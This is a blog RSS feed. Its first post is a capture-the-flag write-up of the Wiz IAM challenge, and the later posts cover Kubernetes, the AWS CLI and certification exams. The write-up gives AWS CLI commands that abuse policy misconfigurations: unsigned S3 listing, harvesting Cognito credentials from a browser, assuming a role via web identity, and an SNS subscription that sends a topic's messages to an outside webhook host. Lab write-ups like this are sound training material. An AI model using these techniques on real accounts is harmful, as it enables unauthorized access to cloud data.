<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Geek Lady on Medium]]></title>
        <description><![CDATA[Stories by Geek Lady on Medium]]></description>
        <link>https://medium.com/@geek-lady?source=rss-d335d3a7fa8d------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*qlKjKi526sEhCqWzlKQB4Q.png</url>
            <title>Stories by Geek Lady on Medium</title>
            <link>https://medium.com/@geek-lady?source=rss-d335d3a7fa8d------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Wed, 06 May 2026 16:46:42 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@geek-lady/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Wiz IAM CTF challenge writeup]]></title>
            <link>https://geek-lady.medium.com/wiz-iam-ctf-challenge-writeup-4146d65c466a?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/4146d65c466a</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[s3]]></category>
            <category><![CDATA[cloud-security]]></category>
            <category><![CDATA[iam-roles]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Tue, 01 Jul 2025 01:44:27 GMT</pubDate>
            <atom:updated>2025-07-01T01:44:27.356Z</atom:updated>
            <content:encoded><![CDATA[<p>I recently found this quite interesting: <a href="https://bigiamchallenge.com/challenge/1">https://bigiamchallenge.com/</a>. Here’s my writeup.</p><h3><strong>Challenge 1 Buckets of fun</strong></h3><p>The IAM policy goes as follows. It shows that the user has access to the thebigiamchallenge-storage-9979f4b bucket.</p><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:GetObject&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*&quot;<br>        },<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:ListBucket&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-storage-9979f4b&quot;,<br>            &quot;Condition&quot;: {<br>                &quot;StringLike&quot;: {<br>                    &quot;s3:prefix&quot;: &quot;files/*&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>So we will peek at what’s inside the bucket first.</p><pre>&gt; aws s3 ls s3://thebigiamchallenge-storage-9979f4b --recursive<br>2023-06-05 19:13:53 37 files/flag1.txt<br>2023-06-08 19:18:24 81889 files/logo.png</pre><p>flag1.txt seems to be the target.</p><pre>&gt; aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -</pre><p>The use case is exactly the same as this example.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T1P9TpPFDSX8fF9TRstPXQ.png" /></figure><h3>Challenge 2 Analytics</h3><p>The new challenge’s IAM policy:</p><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: [<br>                &quot;sqs:SendMessage&quot;,<br>                &quot;sqs:ReceiveMessage&quot;<br>            ],<br>            &quot;Resource&quot;: &quot;arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2&quot;<br>        }<br>    ]<br>}</pre><p>By receiving a message from the queue, we get a bucket link in the body, where the flag hides.</p><pre>&gt; aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2<br>{<br>    &quot;Messages&quot;: [<br>        {<br>            &quot;MessageId&quot;: &quot;581287e7-08ab-445a-910c-7fca773e053f&quot;,<br>            &quot;ReceiptHandle&quot;: &quot;&quot;,<br>            &quot;MD5OfBody&quot;: &quot;&quot;,<br>            &quot;Body&quot;: &quot;&quot;<br>        }<br>    ]<br>}</pre><h3>Challenge 3 Enable Push Notifications</h3><p>The IAM policy is as follows:</p><pre>{<br>    &quot;Version&quot;: &quot;2008-10-17&quot;,<br>    &quot;Id&quot;: &quot;Statement1&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Sid&quot;: &quot;Statement1&quot;,<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: {<br>                &quot;AWS&quot;: &quot;*&quot;<br>            },<br>            &quot;Action&quot;: &quot;SNS:Subscribe&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&quot;,<br>            &quot;Condition&quot;: {<br>
                &quot;StringLike&quot;: {<br>                    &quot;sns:Endpoint&quot;: &quot;*@tbic.wiz.io&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>The most straightforward way is to subscribe to the topic with an email address that fits the endpoint criteria. But there are two problems: we can’t get an email address ending with <em>tbic.wiz.io</em>, and we would need to confirm the subscription from that mailbox.</p><p>So we have to look at other endpoints that can receive the push.</p><pre>--protocol (string)<br><br>The protocol that you want to use. Supported protocols include:<br><br>http – delivery of JSON-encoded message via HTTP POST<br>https – delivery of JSON-encoded message via HTTPS POST<br>email – delivery of message via SMTP<br>email-json – delivery of JSON-encoded message via SMTP<br>sms – delivery of message via SMS<br>sqs – delivery of JSON-encoded message to an Amazon SQS queue<br>application – delivery of JSON-encoded message to an EndpointArn for a mobile app and device<br>lambda – delivery of JSON-encoded message to an Lambda function<br>firehose – delivery of JSON-encoded message to an Amazon Kinesis Data Firehose delivery stream.</pre><p>We can use HTTP or HTTPS. The key is to construct a URL with the same suffix.</p><pre>aws sns subscribe \<br>  --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \<br>  --protocol https \<br>  --notification-endpoint https://webhook.site/b0948c06-98ff-4cfc-8c7f-6530db444bb5/@tbic.wiz.io</pre><p>I tried webhook.site, as many suggested, but I faced a file or directory not found error.</p><h3>Challenge 4 Admin only?</h3><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:GetObject&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*&quot;<br>        },<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: &quot;*&quot;,<br>            &quot;Action&quot;: &quot;s3:ListBucket&quot;,<br>            &quot;Resource&quot;: &quot;arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321&quot;,<br>            &quot;Condition&quot;: {<br>                &quot;StringLike&quot;: {<br>                    &quot;s3:prefix&quot;: &quot;files/*&quot;<br>                },<br>                &quot;ForAllValues:StringLike&quot;: {<br>                    &quot;aws:PrincipalArn&quot;: &quot;arn:aws:iam::133713371337:user/admin&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>This policy only restricts listing the bucket, not getting objects. If we have the object path, we can get the object.</p><p>Even though there’s a condition that seems to restrict listing to the admin user, it sits under ForAllValues. If aws:PrincipalArn is the admin ARN or doesn’t exist in the request at all, the condition evaluates to true, which is why ForAllValues is normally used only in Deny statements (a stricter variant is sketched below).</p>
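<p>For comparison, here is a rough sketch (my own, not part of the challenge) of how the condition could be written without the set operator. A plain StringLike evaluates to false when aws:PrincipalArn is absent from the request context, so anonymous requests would no longer be allowed to list the bucket:</p><pre>&quot;Condition&quot;: {<br>    &quot;StringLike&quot;: {<br>        &quot;s3:prefix&quot;: &quot;files/*&quot;,<br>        &quot;aws:PrincipalArn&quot;: &quot;arn:aws:iam::133713371337:user/admin&quot;<br>    }<br>}</pre>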
<p>So we can pass the <em>--no-sign-request</em> argument in the command, and then no credentials will be loaded at all.</p><pre>aws s3 ls thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request</pre><p>After getting the path of the file, we can view it the same way as in the first challenge.</p><h3>Challenge 5 Do I know you?</h3><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Sid&quot;: &quot;VisualEditor0&quot;,<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Action&quot;: [<br>                &quot;mobileanalytics:PutEvents&quot;,<br>                &quot;cognito-sync:*&quot;<br>            ],<br>            &quot;Resource&quot;: &quot;*&quot;<br>        },<br>        {<br>            &quot;Sid&quot;: &quot;VisualEditor1&quot;,<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Action&quot;: [<br>                &quot;s3:GetObject&quot;,<br>                &quot;s3:ListBucket&quot;<br>            ],<br>            &quot;Resource&quot;: [<br>                &quot;arn:aws:s3:::wiz-privatefiles&quot;,<br>                &quot;arn:aws:s3:::wiz-privatefiles/*&quot;<br>            ]<br>        }<br>    ]<br>}</pre><p>This challenge is very interesting. Open the image from the website in a new tab; if we look at the URL, it contains an AccessKeyId, and the file sits in the wiz-privatefiles S3 bucket.</p><p>Then we open the developer tools in the browser and locate the script for the image. We can tell that the credentials come from Cognito Identity, and we can use them to access the files.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n2W5EBtO8eTC7ereIr5vvQ.png" /></figure><p>So in the console, if we type AWS.config.credentials, we get the following information. It has the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN values that we need.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0lVJWnuV9vWQRPyEiwSMYA.png" /></figure><p>I tried setting these in the terminal of the challenge shell, but it didn’t work, so I had to set the credentials locally.</p>
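<p>Roughly, that just means exporting the three values (placeholders below) in a local shell before calling the CLI:</p><pre>export AWS_ACCESS_KEY_ID=&quot;...&quot;<br>export AWS_SECRET_ACCESS_KEY=&quot;...&quot;<br>export AWS_SESSION_TOKEN=&quot;...&quot;</pre>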
<pre>&gt; aws sts get-caller-identity<br>{<br>    &quot;UserId&quot;: &quot;AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials&quot;,<br>    &quot;Account&quot;: &quot;092297851374&quot;,<br>    &quot;Arn&quot;: &quot;arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials&quot;<br>}</pre><p>We can tell if we’re assuming the right role by running the above command.</p><p>Then we get the file path and fetch the object like in the previous challenges.</p><pre>aws s3 ls wiz-privatefiles/<br>aws s3 cp s3://wiz-privatefiles/flag1.txt -</pre><h3>Challenge 6 One final push</h3><pre>{<br>    &quot;Version&quot;: &quot;2012-10-17&quot;,<br>    &quot;Statement&quot;: [<br>        {<br>            &quot;Effect&quot;: &quot;Allow&quot;,<br>            &quot;Principal&quot;: {<br>                &quot;Federated&quot;: &quot;cognito-identity.amazonaws.com&quot;<br>            },<br>            &quot;Action&quot;: &quot;sts:AssumeRoleWithWebIdentity&quot;,<br>            &quot;Condition&quot;: {<br>                &quot;StringEquals&quot;: {<br>                    &quot;cognito-identity.amazonaws.com:aud&quot;: &quot;us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b&quot;<br>                }<br>            }<br>        }<br>    ]<br>}</pre><p>With the Cognito identity pool ID, we can generate a new identity.</p><pre>&gt; aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b<br>{<br>    &quot;IdentityId&quot;: &quot;us-east-1:157d6171-ee1e-c763-63d3-19e607043322&quot;<br>}</pre><pre>&gt; aws cognito-identity get-open-id-token --identity-id &quot;{your_identityid}&quot;</pre><p>The challenge mentioned that it’s already authenticated with the role <em>arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role</em>. So we will assume this role.</p><pre>&gt; aws sts assume-role-with-web-identity \<br>  --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role \<br>  --role-session-name iam-challenge-6 \<br>  --web-identity-token &quot;{your_token}&quot;</pre><p>Then we run:</p><pre>aws s3 ls</pre><p>It lists a few buckets. After trying to access them, only the last one turns out to be accessible.</p><p>As in the previous challenges, we fetch the object and get the flag.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XioJZQwvCID0gp7HzkkgzQ.png" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=4146d65c466a" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Use crictl to debug a failing pod]]></title>
            <link>https://geek-lady.medium.com/use-crictl-to-debug-a-failing-pod-57404d955cae?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/57404d955cae</guid>
            <category><![CDATA[kubernetes]]></category>
            <category><![CDATA[troubleshooting]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Tue, 03 Jun 2025 13:25:06 GMT</pubDate>
            <atom:updated>2025-06-03T13:25:06.063Z</atom:updated>
            <content:encoded><![CDATA[<h3>What is crictl</h3><p>crictl provides a CLI for CRI-compatible container runtimes.</p><p>The Container Runtime Interface (CRI) is a plugin interface that allows the kubelet to use various container runtimes without needing to recompile Kubernetes.</p><h3>When we use crictl</h3><ol><li><strong>Troubleshooting Pod Failures</strong></li></ol><p>Sometimes, kubectl get pods shows a pod in CrashLoopBackOff or ContainerCreating, but doesn&#39;t give the full story.</p><p><strong>2. When Working Directly with the Container Runtime</strong></p><p>Kubernetes uses a <strong>Container Runtime Interface (CRI)</strong> underneath (e.g., containerd, CRI-O). crictl is useful if you want to debug issues:</p><ul><li>below the Kubernetes level</li><li>or when the kubelet is down</li></ul><p><strong>3. Check Historical Container Info</strong></p><p>kubectl only shows info about currently running or recently failed pods. If a container failed a while ago, it may be gone from kubectl.</p><h3>How to use it</h3><p>First, run the command crictl ps -a. It <strong>lists all containers</strong> (both running and stopped) managed by the container runtime used by Kubernetes, similar to the docker ps -a command.</p><pre>CONTAINER ID        IMAGE                                                                                                             CREATED             STATE               NAME                       ATTEMPT<br>1f73f2d81bf98       busybox@sha256:141c253bc4c3fd0a201d32dc1f493bcf3fff003b6df416dea4f41046e0f37d47                                   7 minutes ago       Running             sh                         1<br>9c5951df22c78       busybox@sha256:141c253bc4c3fd0a201d32dc1f493bcf3fff003b6df416dea4f41046e0f37d47                                   8 minutes ago       Exited              sh                         0<br>87d3992f84f74       nginx@sha256:d0a8828cccb73397acb0073bf34f4d7d8aa315263f1e7806bf8c55d8ac139d5f                                     8 minutes ago       Running             nginx                      0<br>1941fb4da154f       k8s-gcrio.azureedge.net/hyperkube-amd64@sha256:00d814b1f7763f4ab5be80c58e98140dfc69df107f253d7fdd714b30a714260a   18 hours ago        Running             kube-proxy                 0</pre><p>Then we can use crictl logs [CONTAINER-ID] to extract the container’s logs.</p>
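<p>For example, taking the exited busybox container from the listing above, we could pull its logs and then inspect its runtime state; the inspect output includes details such as the exit code. The commands below are a rough sketch reusing that container ID:</p><pre>crictl logs 9c5951df22c78      # stdout/stderr of the exited container<br>crictl inspect 9c5951df22c78   # full runtime view, including exit code<br>crictl pods                    # list the pod sandboxes known to the runtime</pre>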
<img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=57404d955cae" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Kubernetes Quality of Service and pod priority]]></title>
            <link>https://geek-lady.medium.com/kubernetes-quality-of-service-and-pod-priority-1a92b3aa1ead?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/1a92b3aa1ead</guid>
            <category><![CDATA[kubernetes]]></category>
            <category><![CDATA[scheduling]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Sat, 31 May 2025 13:25:58 GMT</pubDate>
            <atom:updated>2025-05-31T13:25:58.745Z</atom:updated>
            <content:encoded><![CDATA[<h3>Quality of Service (QoS)</h3><p>QoS is about <strong>how Kubernetes manages pod resources (CPU/memory)</strong> under <strong>resource pressure</strong> on a node.</p><p>There are <strong>three QoS classes</strong>:</p><ol><li><strong>Guaranteed</strong> — Pod requests and limits are <strong>equal and set</strong> for all containers.</li><li><strong>Burstable</strong> — Pod has <strong>limits and requests set</strong>, but <strong>not equal</strong>.</li><li><strong>BestEffort</strong> — Pod has <strong>no requests or limits</strong> set.</li></ol><p><strong>Effect:</strong> When a <strong>node</strong> runs out of memory or CPU, pods are evicted in this order: BestEffort → Burstable → Guaranteed</p><h3>Pod Priority</h3><p>Pod priority determines the <strong>importance of a pod</strong> during scheduling and eviction.</p><p>Higher priority pods:</p><ul><li>Are <strong>scheduled first</strong> when resources become available.</li><li>Are <strong>evicted last</strong> during node resource pressure.</li><li>Can trigger <strong>preemption</strong> of lower priority pods (if enabled).</li></ul><p><strong>Effect:</strong> If there’s resource contention across the <strong>cluster</strong>, <strong>lower priority pods may be preempted</strong> to make room for higher-priority ones.</p><p>Therefore, QoS and Pod Priority are two orthogonal features, but they both play roles in eviction decisions.</p><p>When a node is under pressure:</p><ul><li>It first considers <strong>QoS class</strong>.</li><li>If multiple pods in the same QoS class are candidates, the <strong>priority value</strong> breaks the tie.</li></ul><p>When the scheduler is under pressure (it cannot place a pending pod), it only considers Pod Priority and PreemptionPolicy to decide which pods to preempt.</p>
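<p>As a rough illustration (the names below are made up), this manifest would give a pod the Guaranteed QoS class, because requests and limits are set and equal for its only container, and would attach a custom PriorityClass to it:</p><pre>apiVersion: scheduling.k8s.io/v1<br>kind: PriorityClass<br>metadata:<br>  name: high-priority<br>value: 1000000<br>preemptionPolicy: PreemptLowerPriority<br>---<br>apiVersion: v1<br>kind: Pod<br>metadata:<br>  name: guaranteed-pod<br>spec:<br>  priorityClassName: high-priority<br>  containers:<br>  - name: app<br>    image: nginx<br>    resources:<br>      requests:        # requests == limits for every container =&gt; Guaranteed<br>        cpu: 500m<br>        memory: 256Mi<br>      limits:<br>        cpu: 500m<br>        memory: 256Mi</pre>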
<img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=1a92b3aa1ead" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[aws s3 cp vs aws s3api get-object]]></title>
            <link>https://geek-lady.medium.com/aws-s3-cp-vs-aws-s3api-get-object-9822bf58c74f?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/9822bf58c74f</guid>
            <category><![CDATA[aws]]></category>
            <category><![CDATA[aws-s3]]></category>
            <category><![CDATA[aws-cli]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Mon, 03 Feb 2025 04:39:21 GMT</pubDate>
            <atom:updated>2025-02-03T04:43:09.594Z</atom:updated>
            <content:encoded><![CDATA[<h3>aws s3 cp VS aws s3api get-object</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xYscqStHCc4T77gxAakliQ.jpeg" /><figcaption>Photo by luis gomes: <a href="https://www.pexels.com/photo/close-up-photo-of-programming-of-codes-546819/">https://www.pexels.com/photo/close-up-photo-of-programming-of-codes-546819/</a></figcaption></figure><p>Recently I had to view an S3 object using the CLI in a read-only environment. I was stuck for a while before I found the solution. Here are my learnings from it.</p><p>First of all, let’s look at the s3 and s3api commands. This <a href="https://aws.amazon.com/blogs/developer/leveraging-the-s3-and-s3api-commands/">article</a> explains the differences and use cases very well.</p><p><strong>In a word, </strong>aws s3api<strong> is low-level while </strong>aws s3<strong> is high-level.</strong> What does that mean? s3api commands directly invoke the S3 API and map nearly one-to-one to the API operations. When we define policies and permissions for S3, we need to specify actions. One commonly used action is GetObject. You will find that s3api has a corresponding command for it, aws s3api get-object. aws s3 commands, on the other hand, simplify managing objects and buckets.</p><p>Now, let’s take a deep dive into aws s3 cp and aws s3api get-object respectively.</p><h3>aws s3 cp</h3><p>The basic syntax is as follows:</p><pre>aws s3 cp<br>&lt;LocalPath&gt; &lt;S3Uri&gt; or &lt;S3Uri&gt; &lt;LocalPath&gt; or &lt;S3Uri&gt; &lt;S3Uri&gt;</pre><p>It can copy files between local storage and S3, or between S3 locations.</p><p>For example,</p><pre>aws s3 cp s3://mybucket/example.txt ./example.txt</pre><p>Back to the initial task I was given: I couldn’t create a new file, nor save the object into an existing file. Gladly, example 13 from the <a href="https://docs.aws.amazon.com/cli/latest/reference/s3/cp.html">official documentation</a> shows a way to stream the file to standard output by using a magical -.</p><pre>aws s3 cp s3://mybucket/example.txt -</pre><h3>aws s3api get-object</h3><p>The simplest command needs to include the bucket, key and outfile. Note that the outfile parameter is specified without an option name such as “--outfile”. The name of the output file must be the last parameter in the command.</p><pre>aws s3api get-object<br>--bucket &lt;value&gt;<br>--key &lt;value&gt;<br>&lt;outfile&gt;</pre><p>For example,</p><pre>aws s3api get-object --bucket mybucket --key example.txt ./example.txt</pre><p>The output file doesn’t need to be created before running this command. It would create a new one if it doesn’t exist.</p><p>If it runs successfully, the output is in JSON format.</p><pre>{<br>    &quot;AcceptRanges&quot;: &quot;bytes&quot;,<br>    &quot;LastModified&quot;: &quot;&quot;,<br>    &quot;ContentLength&quot;: ,<br>    &quot;ETag&quot;: &quot;\&quot;\&quot;&quot;,<br>    &quot;ContentType&quot;: &quot;&quot;,<br>    &quot;ServerSideEncryption&quot;: &quot;&quot;,<br>    &quot;Metadata&quot;: {}<br>}</pre><p>I’ve searched intensively in the <a href="https://docs.aws.amazon.com/cli/latest/reference/s3api/get-object.html">documentation</a> and on the Internet but couldn’t find any way of presenting the file without saving it locally.</p>
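<p>What s3api does give you is finer-grained control over the request itself. For instance (the bucket and key here are just the illustrative ones from above), you can download only a byte range of an object:</p><pre>aws s3api get-object --bucket mybucket --key example.txt --range bytes=0-99 ./first-100-bytes.txt</pre>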
<h3>Conclusion</h3><p>aws s3 cp and aws s3api get-object are two representatives of the s3 and s3api command sets; they are similar but differ in many ways. aws s3 cp is indeed simple to use, suitable for copying files between local storage and S3, or between S3 locations. It can also quickly show you the content of a file in the terminal. aws s3api get-object has more options and hence provides granular control. The output of the command also contains rich information which might be useful for some.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=9822bf58c74f" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[I took a year to pass the CKA exam. Here’s my story.]]></title>
            <link>https://geek-lady.medium.com/i-used-a-year-to-pass-cka-exam-heres-my-story-c1ef22f2e536?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/c1ef22f2e536</guid>
            <category><![CDATA[cka]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Sun, 17 Jul 2022 05:50:58 GMT</pubDate>
            <atom:updated>2022-07-20T12:34:22.876Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4QrSM-O34CIJMc3cnAcNCg.jpeg" /><figcaption>Photo by <a href="https://unsplash.com/@duexsong?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Somruthai Keawjan</a> on <a href="https://unsplash.com/s/photos/roller-coaster?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></figcaption></figure><h3>12 months to go</h3><p>I felt empty after clearing the AWS Associate Architect exam. While I was looking for my next challenge, I chatted to a buddy at work. He told me he was preparing for the <a href="https://training.mirantis.com/certification/dca-certification-exam/">DCA</a> (Docker Certified Associate) exam and his next goal would be the <a href="https://training.linuxfoundation.org/certification/certified-kubernetes-administrator-cka/">CKA</a> (Certified Kubernetes Admin) exam. After some research, I learned that getting CKA certification is more difficult and therefore, more rewarding to me. Without further ado, I registered for the exam.</p><p>The first thing I did was to hop onto the Internet and search ‘how to pass CKA’, most of the materials I found suggested setting two months aside to prepare. They also recommended two resources, a Udemy <a href="https://www.udemy.com/course/certified-kubernetes-administrator-with-practice-tests/">course</a> (also on <a href="https://kodekloud.com/">KodeKloud</a>) and <a href="http://killer.sh">Killer.sh</a>’s exam simulators, which were included in the exam.</p><h3>10 months to go</h3><p>I fell into a pit called self-doubt. It felt impossible to make my way through everything within only two months, because I would have to learn a lot (Linux, Docker, networking, etc.) to better understand Kubernetes. It was also then that I realised that I had to go at my own pace.</p><h3>8 months to go</h3><p>I kept myself away from Kubernetes for a few months and put my head in Terraform. Terraform was a popular skill to have, plus it was easy to pass. So I spent some time in Terraform and got certified, from which I gained some confidence.</p><h3>6 months to go</h3><p>I gave myself a 3-month Christmas break.</p><h3>3 months to go</h3><p>I was finally in a position for the final sprint after taking crash courses on <a href="https://www.openvim.com">Vim</a> and <a href="https://www.udemy.com/course/learn-docker/">Docker</a>. With Kubernetes being so heavily driven by manifests and config files, feeling comfortable with a powerful text editor like Vim was essential. And with Kubernetes as a prominent container orchestrator, it was important to understand exactly <strong>what</strong> I was orchestrating. Docker is so dominant in the container world that basically Docker is equivalent to container.</p><p>On my second attempt to complete the Udemy course, miraculously, I felt that Kubernetes was not difficult as it was before. Then I executed the following code.</p><blockquote>for (int i = days; i &gt; 0; i — ) {<br> watch(tutorial videos);<br> read(documentation);<br> practice(A_LOT);<br>}</blockquote><h3>2 weeks to go</h3><p>There was an episode before the exam. The PSI exam environment had changed, in an unfavourable way. Many people had <a href="https://www.reddit.com/r/kubernetes/comments/vmp631/recent_cka_change_to_a_remote_desktop/">complained</a> about the poor performance of the browser based remote desktop. 
This didn’t make me feel better about my chances in the exam.</p><h3>1 week to go</h3><p>To combat the growing exam anxiety, I signed up for a mindfulness training course.</p><h3>Exam Day</h3><p>The exam experience was truly awful, just as others had complained. I felt panicked when 10 minutes had passed and I hadn’t completed a single challenge. A lot of thoughts were jumping into my mind at that moment. One of them was to click the exit button and close the lid of my laptop. Thankfully, I had anticipated that these thoughts would come, so I used some techniques, such as focusing on my breathing, and successfully shifted my mind back to the task.</p><p>On the 9th of July 2022, I passed the CKA exam on the first go.</p><h3>TL;DR</h3><h3>Dos</h3><ol><li>It’s better to have a basic understanding of containers and Linux before studying Kubernetes.</li><li>Use the Udemy <a href="https://www.udemy.com/course/certified-kubernetes-administrator-with-practice-tests/">course</a> and exam <a href="http://killer.sh">simulators</a>. These are the main resources that I utilised and they are truly helpful.</li><li>Practice. Practice. Practice. Even though the new exam environment is not as smooth as before, being prepared and keeping a good attitude help.</li></ol><h3>Don’ts</h3><ol><li>Don’t push yourself too hard. Everyone has their own pace.</li><li>Don’t be intimidated by the CKA exam. There’s a free retake after all.</li><li>Don’t give up. You can achieve your goal, as long as you hang in there a bit.</li></ol><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c1ef22f2e536" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[An incomplete guide to pass AWS Solution Architect Associate]]></title>
            <link>https://geek-lady.medium.com/an-incomplete-guide-to-pass-aws-solution-architect-associate-bc6119262846?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/bc6119262846</guid>
            <category><![CDATA[solution-architect]]></category>
            <category><![CDATA[aws]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Fri, 26 Feb 2021 22:12:18 GMT</pubDate>
            <atom:updated>2021-02-27T02:07:27.961Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DmUf9smSja1BOTHOTtIFew.jpeg" /><figcaption>Photo by Green Chameleon on Unsplash</figcaption></figure><h3>An incomplete guide to pass AWS Solution Architect Associate exam</h3><h3>About me</h3><p>80% self-taught coding, almost 0 AWS experience, didn’t study Cloud Practitioner, 1.5 months to prepare. Used materials from AWS SheBuilds Cloud U, Stephane Maarek’s lectures and practice exams on Udemy, Demystifying the exam on Pluralsight. In addition, I attended a 3 day AWS Sys Ops training.</p><h3>Overview of the exam</h3><ul><li>Multiple choice questions, with single or multiple selections</li><li><em>65</em> questions</li><li><em>130</em> minutes but extra <em>30</em> minutes for people who’re not native English speakers (need to apply accommodation before registering the exam)</li><li>Domains include designing resilient (30%), performant (28%), secure (24%), cost-optimised architecture (18%).</li></ul><p>All right, let’s jump to the core: how to prepare for this exam.</p><p>I would divide my learning journey into 3 parts, <strong>creating points, connecting dots and last sprint.</strong></p><h3>Creating points (~3 w)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wDXlqun-rYe_qbqKe2gPOQ.jpeg" /><figcaption>Photo by <a href="https://unsplash.com/@na_photo?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Nagy Arnold</a> on <a href="https://unsplash.com/s/photos/geometry-dot?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></figcaption></figure><p>The purpose of this stage is to familiarise with AWS services. If you have free access to Udemy, you can watch Ultimate AWS Certified Solutions Architect Associate 2021. It’s very detailed and lecturer would mention past exam questions from time to time. However, this course is very long (27 sections, 24h 10m) and not structured well. To better use this material, I recommend watching it selectively.</p><p>If you don’t have access, that’s all right. You can make full use of the documentation (https://docs.aws.amazon.com/)! Services are grouped together. I will prioritise groups based on frequencies of questions that appear in the exam, roughly.</p><h4><strong>Compute 